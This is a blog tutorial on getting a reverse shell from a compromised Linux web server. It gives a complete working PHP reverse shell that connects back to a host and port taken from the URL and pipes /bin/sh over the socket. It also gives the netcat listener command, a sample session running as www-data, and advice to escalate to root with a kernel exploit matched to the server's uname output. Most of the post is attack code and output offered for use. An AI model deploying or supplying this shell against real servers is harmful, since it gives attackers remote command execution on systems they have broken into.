Tuesday, 06 December 2011

PHP Reverse Shell On Linux Server

If you are attacking a website and have successfully compromised it, you usually need to connect back from the web server to your own machine to continue the attack. I have one simple PHP script for that: you only enter your IP address and port in the URL and it connects back. For example:

http://192.168.56.101/rs.php?ip=192.168.56.1&port=1234

Here 192.168.56.101 is the target's IP, rs.php is the script, and the ip and port variables are the address and listening port of your local machine.


The relevant part of the script is below.

The original script asks you to edit the ip and port variables by hand before uploading it.

Script before the change (the variable block at the top of the script):
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS: attacker address, hard-coded
$port = '1234';     // CHANGE THIS: attacker listening port, hard-coded
$chunk_size = 1400; // bytes moved per read/write between socket and shell
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';  // commands run once the socket is up
$daemon = 0;
$debug = 0;


The script after the change (ip and port are now read from the query string):
$VERSION = "1.0";
$ip = $_GET['ip'];      // CHANGED: taken from ?ip= in the URL
$port = $_GET['port'];  // CHANGED: taken from ?port= in the URL
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Note that with this change both values are used exactly as they arrive in the URL, with no validation, and the file answers to anyone who can reach it: whoever finds rs.php on the server can point the shell at their own listener. Remove the file from the web root as soon as you no longer need it.

You can download the full script here (the variable names above are those of the pentestmonkey php-reverse-shell, which is the script these fragments come from).
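The fragments above only show the variable block. For completeness, here is a self-contained reverse shell that exposes the same ?ip=&port= interface but validates both parameters before opening the socket. This is an added example written for this page, not the original script or the pentestmonkey code; it assumes fsockopen() and proc_open() are not blocked by disable_functions on the target, and the "connection successfully" message is echoed to match what the post describes.

```php
<?php
// Added example: minimal PHP reverse shell driven by ?ip=...&port=...
// Not the original rs.php. Assumes fsockopen() and proc_open() are enabled.

set_time_limit(0);
ignore_user_abort(true);

// Callback target from the URL, e.g. rs.php?ip=192.168.56.1&port=1234
$ip   = isset($_GET['ip'])   ? $_GET['ip']   : '';
$port = isset($_GET['port']) ? $_GET['port'] : '';

// Validate before use: an IPv4/IPv6 literal and a port in 1..65535.
// Anything else is rejected instead of being handed to the socket layer.
if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
    die("bad ip\n");
}
if (!ctype_digit($port) || (int)$port < 1 || (int)$port > 65535) {
    die("bad port\n");
}
$port = (int)$port;

// Connect back to the listener (nc -l -n -v -p <port> on the attacker side).
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    die("connect failed: $errstr ($errno)\n");
}
echo "connection successfully\n";
flush();

// Spawn the shell with stdin/stdout/stderr as pipes; the initial commands
// mirror the original script's $shell string.
$descriptors = array(
    0 => array('pipe', 'r'),
    1 => array('pipe', 'w'),
    2 => array('pipe', 'w'),
);
$proc = proc_open('uname -a; w; id; /bin/sh -i', $descriptors, $pipes);
if (!is_resource($proc)) {
    fclose($sock);
    die("proc_open failed\n");
}

// Non-blocking streams so stream_select() can multiplex socket and pipes.
stream_set_blocking($pipes[0], false);
stream_set_blocking($pipes[1], false);
stream_set_blocking($pipes[2], false);
stream_set_blocking($sock, false);

$chunk_size = 1400;
while (true) {
    if (feof($sock) || feof($pipes[1])) {
        break;  // listener went away or the shell exited
    }
    $read  = array($sock, $pipes[1], $pipes[2]);
    $write = null;
    $error = null;
    if (stream_select($read, $write, $error, null) === false) {
        break;
    }
    // Listener -> shell stdin
    if (in_array($sock, $read)) {
        $input = fread($sock, $chunk_size);
        if ($input !== false && $input !== '') {
            fwrite($pipes[0], $input);
        }
    }
    // Shell stdout/stderr -> listener
    if (in_array($pipes[1], $read)) {
        fwrite($sock, fread($pipes[1], $chunk_size));
    }
    if (in_array($pipes[2], $read)) {
        fwrite($sock, fread($pipes[2], $chunk_size));
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($proc);
```

The validation does not make the file safe to leave behind (anyone who can reach it still gets a shell as the web server user), it only stops malformed input from reaching fsockopen(); treat the file as a temporary foothold and delete it when finished.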

Next, after making the change, open a terminal on your local machine and use netcat to listen for the connection. Example:

root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
netcat is now listening on port 1234. The -l -n -v -p form is the traditional netcat syntax; newer variants such as ncat and the OpenBSD nc typically take the same options as nc -lvnp 1234.

Go to your browser and run the script on the target web server, passing your IP address and destination port in the URL.
If the connection succeeds the page shows a message like "connection successfully".
Look at your terminal and you will see something like this:

root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37140
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
 20:47:47 up  2:12,  6 users,  load average: 0.09, 0.07, 0.06
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1     -                18:36    2:11m  0.11s  0.00s /bin/bash /usr/
root     pts/0    :0               18:36    2:11m  0.00s  1.64s kdeinit4: kded4
root     pts/2    :0.0             18:37    2:10m  4.28s  4.23s wvdial smart
root     pts/3    :0.0             18:38    1:10m  1.03s  1.02s elinks
root     pts/1    :0.0             20:32   15:13   0.01s  0.01s /bin/bash
root     pts/6    :0.0             20:41   13.00s  0.03s  0.00s nc -l -n -v -p
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: no job control in this shell
sh-4.1$ 

The shell runs as www-data, so now run your exploit to get root access; match it to the kernel version shown by uname -a above (here 2.6.39.4).
For more information about kernel exploits read my older post get-root-access-on-server,
and visit Exploit-db for more exploits.
Thanks for reading... :D
